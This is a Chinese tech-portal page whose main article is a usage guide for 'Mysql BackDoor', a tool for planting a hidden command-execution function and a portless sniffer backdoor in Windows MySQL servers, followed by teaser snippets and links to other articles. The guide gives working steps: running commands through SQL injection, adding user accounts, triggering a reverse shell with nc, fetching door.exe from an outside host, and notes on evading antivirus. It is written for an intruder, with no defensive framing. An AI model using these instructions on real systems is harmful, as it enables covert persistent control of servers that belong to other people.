mysql backdoor的使用方法 安装mysql backdoor的步骤
Mysql BackDoor是一款针对PHP Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003 MYSQL5.0.X下通过.
[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.
[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
[卸载]
在Mysql上运行"drop function state"便可卸载,但同时会造成mysql进程退出,重启后恢复正常。
详细用法看压缩包内图文说明。http://blogimg.chinaunix.net/blog/upfile2/080712123321.rar
注意:能过杀毒软件,但过不了主动防御,主动防御太狠了,后门执行系统命令、发邮件、反向连接都会被发现。
发送Mysql-cmd c net user abc add,mysql backdoor运行cmd命令便会被主动防御截获:
发送Mysql-c-,mysql bookdoor运行管道重定向便会被主动防御截获,可见卡巴斯基监视了内存或句柄表:
什么是加密?加密与数字签名有何区别?
什么是加密?用非常基本的词汇说,加密是一种以密码方式发送信息的方法。只有拥有正确密钥的人才能解开这个信息的密码。对于其他人来说,这个信息看起来就像是一系列随机的字母、数字和符号。如果你要发送不应该让
详情2018-01-22 14:56:19责编:llp 来源:驱动管家iphoto有什么功能?iphoto的格式串漏洞怎么修复?
受影响系统:Apple iPhoto & 39;08 7 1不受影响系统:Apple iPhoto 7 1 2描述:BUGTRAQ ID: 27636CVE(CAN) ID: CVE-2008-0043iPhoto是用于导入、组织和共享数码照片的工具。iPhoto在处理photocast订阅时
详情2018-01-26 17:35:10责编:llp 来源:驱动管家oracle 8i版本怎么进行系统入侵的?系统入侵的步骤是什么?
最近看了些有关 Oracle 的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅 。先用 SuperScan4 0 扫描下要测试的主机,速度很快,结果如图 1 所示:图 1端口 1521 是 Oracle 的 TNS List
详情2018-01-25 11:28:40责编:llp 来源:驱动管家网络服务器性能监控工具具备哪些技能?
网络性能监控工具对于it行业的来说是必不可少的一个工具,但是在使用的同时也要注意考虑到网络性能监控工具应该具备哪些技能,下面小编就为大家具体的讲解现代网络性能监控工具应具备何种技能。以前,企业网络工
详情2018-02-02 12:18:36责编:llp 来源:驱动管家什么是数字遗物?人死了各种私人账号如何处理?
人总有一死,现在想想我的八位qq那么值钱,等我死了岂不是更值钱了?我的qq号以后怎么办呢,更别说自媒体管理员,几百万人的粉丝账号怎么办?你考虑过死了以后你的私人账号怎么办吗?那你在离开人世之前,考虑过
详情2018-02-03 16:19:03责编:llp 来源:驱动管家超级保镖的密码如何破解?密码破解方法在这里
超级保镖从面市以来就受到了广大电脑爱好者的欢迎,它的磁盘保护功能是让人惊叹的,有一句话说的是“有利就有弊”,这么强大的功能一定也有弊的一面。如果您忘记了超级保镖的系统管理员密码,那您就不能进入超级
详情2018-01-25 12:28:24责编:llp 来源:驱动管家手机使用技巧 智能手机怎么用?
1。用智能手机工作室1 1版备份联系人、短信、通话记录等, 下载刷机相关文件(刷机工具, ROM, Radio, 格式化ExtROM工具Repart_DOC exe), 同步软件ActiveSync要用最新版4 0以上的。2。确认下载的ROM文件(n
详情2018-01-04 11:50:01责编:llp 来源:驱动管家shift后门的原理是什么?如何清除shift后门?
在cmd下输入以下命令 下面再打开记事本把底下的代码粘贴进去。复制代码代码如下:@echo offclsecho ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~echo echo Shift后门ech
详情2018-01-15 15:25:55责编:llp 来源:驱动管家微软lnk漏洞是什么?如何防范微软lnk漏洞的危害?
微软漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,使攻击者能够在未授权的情况下访问或破坏系统,按严重程度分为“紧急”、“重要”、“警告”、“注意”四种。近日,微软 lnk漏洞(快捷方式
详情2018-02-06 13:25:21责编:llp 来源:驱动管家sql语句怎么导出?又怎么导入?
SQL全称是“结构化查询语言(Structured Query Language)”,最早的是IBM的圣约瑟研究实验室为其关系数据库管理系统SYSTEM R开发的一种查询语言,它的前身是SQUARE语言。sql语句怎么导出?又怎么导入? *******
详情2018-01-17 18:08:02责编:llp 来源:驱动管家
- win7显卡驱动不能正常安装?试试这三个办法
- QT语音怎样使用视频功能?QT语音视频功能怎么用?
- 学习宝怎么用的?学习宝的功能好用吗?
- 你知道利用ie工具可以实现上网加速设置吗
- 在win8系统的电脑上应该如何创建宽带连接
- 电脑音箱出了故障怎么解决?看看这份电脑音箱常见故障指南
- 华为荣耀3c畅玩版开箱测评 华为荣耀3c畅玩版图片
- 苹果更换电池的流程是怎么样的?苹果更换电池如何查询资格?
- asp基础教程 怎么判断asp搜索型注入漏洞是否存在?
- Win7旗舰版在安装显卡驱动后就不断重启是怎么回事?
- 微信电话本免费通话怎么用的?微信电话本免费通话使用方法
- qt语音是什么?qt语音可以变声吗?
- 在win8电脑上没有本地连接怎么办?win8本地连接在哪里
- 在系统上不小心删除的文件有什么办法可以恢复
- 猫版超级玛丽能安装却不能正常运行 要怎么办?
- iphone8和iphone7外观差别大吗?iphone8和iphone7哪个好看?
- 智能手机怎么省流量?智能机如何省流量?
- 数据加密技术 动态加密的相关知识介绍
- Bitlocker是什么?win10怎么启用Bitlocker驱动器加密
- goldwave中文版使用方法是什么?goldwave中文版教学